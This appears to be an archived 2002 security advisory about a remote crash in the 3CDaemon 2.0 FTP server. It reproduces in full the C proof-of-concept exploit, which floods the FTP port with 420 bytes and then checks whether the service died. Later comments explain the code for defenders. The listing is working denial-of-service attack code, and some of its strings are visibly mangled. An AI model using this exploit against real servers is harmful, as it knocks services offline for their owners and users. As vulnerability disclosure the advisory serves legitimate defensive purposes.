
3Cdaemon remote DoS
2nd May 2002 [SBWID-5322]
COMMAND

	3Cdaemon remote DoS

SYSTEMS AFFECTED

	3Cdaemon 2.0 revision 10

PROBLEM

	MaD SKiLL 'H' [http://www.madskill.tk] says:
	

	When 400+ chars are sent to the FTP server, it crashes immediately.
	

	 Sample :

	 ========

	

	

	/* MaD SKiLL \'H\'

	* MsH 4 life! http://www.madskill.tk

	* *Private Release*

	*

	* 3CDaemon 2.0 revision 10 DoS

	*

	* 11:12 14-4-2002: BOF flaw found by skyrim

	*  1:00 15-4-2002: exploit done.

	* 23:31 16-4-2002: Edited the exploit slightly, it's better code now

	*

	* This program will exploit the buffer overflow vulnerability of

	* 3CDaemon 2.0 FTP servers. Sending 400+ chars will make the server crash

	* at any time they're sent.

	*

	* Tested on:

	* [OS]                                    [version]

	*  Windows XP (5.1 - 2600)                 3CDaemon 2.0 revision 10

	*

	*  ###

	* #####      ####                            ##

	* ######    ######                         ######

	* ######   ########   ########            ########      ######

	* ######  ####### ### ###########          ########     #######

	* ###### ######## #### ############        ########     #######

	* ############### ##### ############        #######     #######

	* ############## ######  ############       #######     #######

	* ############## #######  ###########        ######    #######

	* ############# ########  ### ########       ######  #########

	*  ############ ### ####  ### #######        #################

	*   ##### ###############  ##########        #################

	*    ###  ######### #####  #########         ################

	*    #### ######### ##### #########          ################

	*     ### ######### #############            ################

	*      ## #########  ######                  ######   #######

	*          ### ####                          ######   #######

	*                                            ######  ########

	*                                            ######  ########

	*    ####   ## ###### ###  ###        ###    ######  ########

	*   ####### ########  ###  ####      #####    #####   #######

	*   ###############   ###  ####      #####     #####  #######

	*   ####### ########       ####      #####       ##     ###

	*   ######  ######### #### ####      #####

	*    #####   ######## #### ####       ####

	*     ###### ######## #### ####   ### ####   ##

	*      ########## ### #### #### ########## ######

	*       ######### ### ###########################

	*      ##########  ######## #####################

	*    #############  ######  ########## ##########

	*   ########  #####   ####  ###   ###  ###   ###

	*

	* I don't know if this will work on versions other than the one I tested it on.

	* Have fun.

	*

	* Crew shouts go to: MsH, DFA, uDc

	* Personal shouts to: mannie, primus, amok, torment, talented, warsteam, 

	frodo, maxxo,

	* xo|l, fearless, cybje, kell, frodo, maxxo, and everyone else.

	*

	* skyrim (skyrim@m4dskill.tk)

	*/

	#include <stdio.h>

	#include <sys/types.h>

	#include <sys/socket.h>

	#include <netinet/in.h>

	#include <netdb.h>

	

	#define BOFSIZE 420

	

	/*
	 * Prints the tool's banner to stdout.
	 * NOTE(review): declared to return char but contains no return statement;
	 * the one visible caller ignores the result.
	 * NOTE(review): the backslash-escaped quotes and the line break inside the
	 * string literal look like page-extraction artifacts, not original source
	 * -- confirm against a clean copy before relying on this listing.
	 */
	char banner(void) { printf(\"MaD SKiLL \'H\' 3CDaemon 2.0 revision 10 

	DoS\\n.:[MsH]:.\\n   ---\\n\"); }

	

	/* Report msg together with the errno description via perror(), then exit with status 1. */
	void E(char *msg)
	{
	    perror(msg);
	    exit(1);
	}

	

	/*
	 * Proof-of-concept driver for the crash described in this advisory.
	 *
	 * Takes a hostname/IP and a port on the command line, opens a TCP
	 * connection, writes a buffer of 'A' bytes (BOFSIZE is defined as 420),
	 * closes the socket, then waits 5 seconds and attempts a second connection.
	 * A failed second connect is reported as the server having died; a
	 * successful one as the server still being alive.
	 *
	 * Exit status: 1 on a usage error or when E() is called after a failed
	 * socket/lookup/connect/write; 0 otherwise.
	 *
	 * For defenders: what this listing puts on the wire is a single overlong
	 * run of identical bytes on the FTP control connection, sent immediately
	 * after the TCP handshake with no USER/PASS exchange before it.
	 */
	main(int argc, char *argv[])

	{

	    static char ownage[BOFSIZE];

	    int sockfd, sockfd2, n;

	

	    struct sockaddr_in server_addr;

	    struct hostent *server;

	

	/* Exactly two arguments are required: target host and port. */
	if (argc != 3) {

	    fprintf(stderr,\"Usage: %s hostname/ip port\\n\", argv[0]);

	    exit(1);

	   }

	    banner();

	    /* Every byte of the buffer becomes 'A'; no room is left for a terminating NUL. */
	    memset(ownage, \'A\', BOFSIZE);

	    sockfd = socket(AF_INET, SOCK_STREAM, 0);

	    if (sockfd < 0) E(\"Error occured during opening socket\");

	    /* Resolve the first argument; a NULL result aborts through E(). */
	    server = gethostbyname(argv[1]);

	    if (server == NULL) E(\"Error occured during host lookup -No such 

	host?-\\n\");

	

	    /* Build the IPv4 destination from the resolved address and the port in argv[2]. */
	    bzero((char *) &server_addr, sizeof(server_addr));

	    server_addr.sin_family = AF_INET;

	    bcopy((char *)server->h_addr,

	         (char *)&server_addr.sin_addr.s_addr,

	         server->h_length);

	    /* NOTE(review): atoi() gives no error indication, so a non-numeric port is not rejected here. */
	    server_addr.sin_port = htons(atoi(argv[2]));

	    printf(\"Connecting to target FTP server... \");

	    if (connect(sockfd,&server_addr,sizeof(server_addr)) < 0) { E(\"Error 

	occured during connecting\\n\"); }

	    printf(\"Connected, Probing BOF... \\n\");

	    /*
	     * The buffer is written straight after connect(): this listing sends no
	     * FTP command verb, no login and no CRLF. That suggests the crash does
	     * not depend on valid credentials -- inferred from this code only, confirm.
	     * NOTE(review): strlen() runs on the fully filled, unterminated array and
	     * reads past its end, so the byte count actually sent is not guaranteed
	     * to equal BOFSIZE.
	     */
	    n = write(sockfd,ownage,strlen(ownage));

	    if (n < 0) { E(\"Error occured during writing to socket\"); }

	    close(sockfd);

	    /* Liveness probe: a second socket is created (its return value is not checked). */
	    sockfd2=socket(AF_INET, SOCK_STREAM, 0);

	    printf(\"Done, checking if server is dead.. \\n\");

	    sleep(5);

	    /*
	     * A failed connect() is the only crash indicator used. NOTE(review): it
	     * cannot tell a crashed service from one that is merely filtered or
	     * refusing connections for another reason.
	     */
	    if (connect(sockfd2,&server_addr,sizeof(server_addr)) < 0) { 

	printf(\"Couldn\'t establish connection: It seems like it died! =)\\n\"); 

	exit(0); }

	    printf(\"Server is still alive. Perhaps its not vulnerable?\\n\");

	    return 0;

	}

	

	

	

	

SOLUTION

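	None known at the time of this advisory. Until a fixed version is available, limit network access to the 3CDaemon FTP service to trusted hosts, or leave the service disabled when it is not in use.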
